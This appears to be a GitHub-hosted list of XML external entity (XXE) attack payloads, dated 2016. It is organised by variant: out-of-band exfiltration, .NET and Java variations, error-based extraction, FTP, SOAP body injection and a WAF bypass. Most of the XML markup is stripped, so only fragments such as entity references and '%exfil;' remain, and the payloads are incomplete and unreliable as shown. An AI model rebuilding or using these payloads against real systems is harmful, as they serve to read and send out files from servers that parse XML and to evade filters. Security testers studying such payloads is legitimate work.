XXE Payloads

July 7, 2016 · View on GitHub

]> &sp;

OoB extraction

%sp; %param1; ]> &exfil;

External dtd:

">

OoB variation of above (seems to work better against .NET)

%sp; %param1; %exfil; ]>

External dtd:

">

OoB extraction

%sp; %param3; %exfil; ]>

External dtd:

">

OoB extra ERROR -- Java

%sp; %param3; %exfil; ]>

External dtd:

'> %param1; %external;

OoB extra nice

">

%dtd; ]> &all;

External dtd:

File-not-found exception based extraction

%one; %two; %four; ]>

External dtd:

">

-------------------------^ you might need to encode this % (depends on your target) as: %

FTP

%asd; %c; ]> &rrr;

External dtd

">

Inside SOAP body

soap:Body %dtd;]>]]></soap:Body>

Untested - WAF Bypass